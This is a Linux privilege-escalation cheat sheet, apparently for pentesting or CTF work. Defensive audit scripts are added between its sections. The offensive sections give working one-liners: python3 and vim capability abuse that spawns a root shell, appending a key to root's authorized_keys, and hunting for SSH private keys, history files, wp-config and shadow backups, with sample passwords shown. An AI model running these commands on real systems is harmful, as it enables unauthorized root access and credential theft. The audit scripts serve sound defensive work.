FILE PERMISSIONS & CAPABILITIES

World-writable files

Files anyone can modify — Config files, scripts, binaries

find / -writable -type f 2>/dev/null | grep -v proc
Example Output
find / -writable -type f 2>/dev/null
/etc/passwd         <- can add root user!
/opt/app/config.py  <- can inject code
/var/www/html/index.php <- can add webshell

World-writable directories

Directories anyone can write to — Drop files for path hijack

find / -writable -type d 2>/dev/null
Example Output
find / -writable -type d 2>/dev/null
/tmp
/var/tmp
/opt/app/plugins/  <- can drop files here
/usr/local/bin/    <- PATH hijack possible
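Added audit script for the two world-writable checks above (example code, not part of the original cheat sheet). Note the caveat it encodes: find -writable answers "can the user running find write here?", which also lists that user's own files, whereas world-writable means the "other" write bit, -perm -0002. Sticky-bit directories such as /tmp are world-writable by design, so the script reports them separately from directories where anyone can add or replace files. The function names, output labels and the pruned pseudo-filesystem list are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: world-writable audit.
# -perm -0002 tests the "other" write bit (what world-writable means);
# sticky directories (1777, e.g. /tmp) are expected and listed separately
# because users cannot remove or rename each other's files there.
# /proc, /sys and /dev are skipped as noise when ROOT is /.

# audit_world_writable ROOT
# Prints one finding per line, "<KIND> <PATH>", with KIND one of:
#   STICKY_DIR  world-writable directory with the sticky bit (normal for /tmp)
#   WW_DIR      world-writable directory without it (anyone can add/replace files)
#   WW_FILE     world-writable regular file (anyone can change its contents)
audit_world_writable() {
    root="$1"
    # Helper: prune pseudo-filesystems, then apply the caller's tests.
    _find_ww() {
        find "$root" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
             "$@" -print 2>/dev/null
    }
    _find_ww -type d -perm -0002 -perm -1000   | sed 's/^/STICKY_DIR /'
    _find_ww -type d -perm -0002 ! -perm -1000 | sed 's/^/WW_DIR /'
    _find_ww -type f -perm -0002               | sed 's/^/WW_FILE /'
}

# Only the findings that need attention (everything except sticky dirs).
audit_world_writable_actionable() {
    audit_world_writable "$1" | grep -v '^STICKY_DIR '
}

# Usage: sh ww_audit.sh /      (with no argument the file only defines the functions)
[ "$#" -eq 0 ] || audit_world_writable "$1"
```

A WW_DIR or WW_FILE hit outside a deliberately shared location is a finding to fix with chmod o-w (or by moving the file out of the shared directory); a STICKY_DIR hit is only worth a look if it is not one of the usual temp directories.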

Linux capabilities

Capabilities on binaries — cap_setuid = instant root

getcap -r / 2>/dev/null
Example Output
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep  <- instant root!
/usr/bin/ping = cap_net_raw+ep    <- normal, ignore

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root

Capability abuse

GTFOBins for capabilities too — Capabilities are like mini-SUID

python3 with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example Output
getcap shows: /usr/bin/python3 = cap_setuid+ep

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root

OR: /usr/bin/vim = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh","sh")'
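Added triage script for getcap output (example code, not part of the original cheat sheet). It sorts the capabilities that are effectively root (the cap_setuid case above and its relatives) from expected ones such as cap_net_raw on ping, so an audit job can alert on the former. It parses both getcap output styles seen in the wild: older libcap prints "/usr/bin/python3 = cap_setuid+ep", newer libcap prints "/usr/bin/python3 cap_setuid=ep". The HIGH_RISK_CAPS list, the function names and the sample lines in the comments are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: classify getcap output.
#   older libcap:  /usr/bin/python3 = cap_setuid+ep
#   newer libcap:  /usr/bin/python3 cap_setuid=ep

# Capabilities that let a process change identity, bypass file permissions or
# reach the kernel: any of these on a user-runnable binary is a finding.
HIGH_RISK_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search \
cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap"

# classify_caps  (reads getcap lines on stdin)
# Prints "ALERT <path> <caps>" or "OK <path> <caps>", one per input line.
classify_caps() {
    while read -r path rest; do
        [ -n "$path" ] || continue          # skip blank lines
        caps=${rest#= }                     # drop the "= " of the older format
        # "cap_a,cap_b+eip" or "cap_a,cap_b=ep" -> "cap_a cap_b"
        names=$(printf '%s' "$caps" | sed 's/[+=][a-z]*//g; s/,/ /g')
        verdict=OK
        for n in $names; do
            case " $HIGH_RISK_CAPS " in
                *" $n "*) verdict=ALERT ;;
            esac
        done
        echo "$verdict $path $caps"
    done
}

# count_alerts  (reads getcap lines on stdin) -> number of ALERT entries
count_alerts() {
    classify_caps | grep -c '^ALERT ' || :
}

# Usage: sh cap_triage.sh /     (with no argument the file only defines the functions)
[ "$#" -eq 0 ] || getcap -r "$1" 2>/dev/null | classify_caps
```

An ALERT on an interpreter or editor is fixed by removing the file capability (setcap -r /usr/bin/python3) and giving the job that needed it a narrower capability or a dedicated helper; the getcap output is also cheap to snapshot and diff from a cron job so new capability grants show up.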

SSH keys

Private keys for other users — SSH as root or other user

find / -name 'id_rsa' -o -name 'authorized_keys' -o -name '*.pem' 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
/root/.ssh/id_rsa  <- root's key!
/opt/backups/.ssh/id_rsa

find / -name authorized_keys -writable 2>/dev/null
/root/.ssh/authorized_keys  <- WRITABLE!
echo 'your_pub_key' >> /root/.ssh/authorized_keys
ssh root@localhost
(Write your key = root SSH access)

Readable config files

Database passwords, API keys — Password reuse is common

find / -name '*.conf' -readable 2>/dev/null
find / -name '*.config' -readable 2>/dev/null
find / -name 'wp-config*' 2>/dev/null
Example Output
find / -name '*.conf' -readable 2>/dev/null
/etc/apache2/sites-enabled/000-default.conf

find / -name 'wp-config*' 2>/dev/null
/var/www/html/wp-config.php

cat /var/www/html/wp-config.php
define('DB_PASSWORD', 'WordPressDBp@ss!');
(Database credentials)

History files

Previous commands — May contain typed passwords

cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
cat ~/.mysql_history
Example Output
cat /home/admin/.bash_history
mysql -u root -p'S3cretDBP@ss'
ssh root@10.10.10.20
sudo su - backup_user
(Passwords typed in commands)

Backup files

Backup files with old configs — Old passwords, keys

find / -name '*.bak' -o -name '*.old' -o -name '*.backup' -o -name '*.zip' -o -name '*.tar.gz' 2>/dev/null
Example Output
find / -name '*.bak' -o -name '*.old' 2>/dev/null
/var/backups/shadow.bak  <- old shadow file!
/opt/config.old  <- old config with passwords

cat /var/backups/shadow.bak
root:$6$oldhash...
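Added audit covering the three sections above, readable config files, history files and backup files (example code, not part of the original cheat sheet). It finds files whose names match those patterns and that are readable by "other" (-perm -004), and for each reports how many lines look like credentials without printing the values, so the report itself is safe to ship to a ticket or a SIEM. The name patterns, the credential regex and the function names are assumptions chosen for this example.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: find world-readable
# files of the kinds that tend to hold credentials, and count (not print)
# the credential-looking lines in each.

# Lines that look like they carry a credential (matched case-insensitively).
CRED_RE='password|passwd|secret|api[_-]?key|token'

# secret_lines FILE -> number of credential-looking lines (0 if none or unreadable)
secret_lines() {
    n=$(grep -ciE "$CRED_RE" "$1" 2>/dev/null) || :
    echo "${n:-0}"
}

# audit_readable_secrets ROOT
# Prints "READABLE <n> <path>" for each matching file readable by other,
# where <n> is the secret_lines count. Patterns mirror the sections above:
# wp-config*, *_history (.bash_history, .mysql_history), backups, shadow copies.
audit_readable_secrets() {
    find "$1" \( -path /proc -o -path /sys -o -path /dev \) -prune -o -type f \
         \( -name 'wp-config*' -o -name '*_history' -o -name '*.bak' \
            -o -name '*.old' -o -name '*.backup' -o -name 'shadow*' \) \
         -perm -004 -print 2>/dev/null |
    while read -r f; do
        echo "READABLE $(secret_lines "$f") $f"
    done
}

# Usage: sh readable_secrets.sh /     (no argument: only defines the functions)
[ "$#" -eq 0 ] || audit_readable_secrets "$1"
```

A READABLE line with a non-zero count is a credential exposed to every local account and usually means a chmod o-r plus a rotation of whatever the file contains; a zero count still deserves a look for files like shadow.bak, whose hashes the regex does not match.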

/opt and /srv

Custom installed applications — Often misconfigured

ls -la /opt/
ls -la /srv/
Example Output
ls -la /opt/
drwxrwxrwx  admin app_v2/  <- writable custom app!
-rwsr-xr-x  root  monitor  <- SUID custom binary!

ls -la /srv/
drwxr-xr-x  root  web/  <- alternative web root
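Added baseline-and-diff script for setuid/setgid binaries in custom application directories such as /opt and /srv (example code, not part of the original cheat sheet). A SUID binary a vendor dropped into /opt is easy to miss in a one-off listing; keeping a sorted inventory and diffing against it on a schedule turns a new SUID file into an alert. The function names, the baseline file location in the usage comment and the constructed test files are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: inventory SUID/SGID
# files under the given directories and diff against a saved baseline.

# setuid_inventory DIR... -> sorted "mode owner path" lines, one per SUID/SGID file
# (ls -ld is used for portability; paths containing spaces would be truncated)
setuid_inventory() {
    find "$@" -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null |
        awk '{print $1, $3, $NF}' | sort
}

# setuid_diff BASELINE DIR...
# Prints "NEW <mode> <owner> <path>" for each SUID/SGID file not in BASELINE
# (a file written earlier by setuid_inventory); returns 1 if any were found.
setuid_diff() {
    base="$1"; shift
    now=$(mktemp)
    setuid_inventory "$@" > "$now"
    new=$(comm -13 "$base" "$now")      # lines only in the current inventory
    rm -f "$now"
    [ -n "$new" ] || return 0
    printf '%s\n' "$new" | sed 's/^/NEW /'
    return 1
}

# Usage:
#   setuid_inventory /opt /srv > /var/lib/suid.baseline   # once, after review
#   sh suid_baseline.sh /var/lib/suid.baseline /opt /srv   # from cron; non-zero = new SUID file
[ "$#" -lt 2 ] || setuid_diff "$@"
```

Each NEW line should be either justified and added to the baseline or stripped with chmod u-s,g-s; the same inventory is worth running over / with -xdev once to get a picture of the distribution's own SUID set.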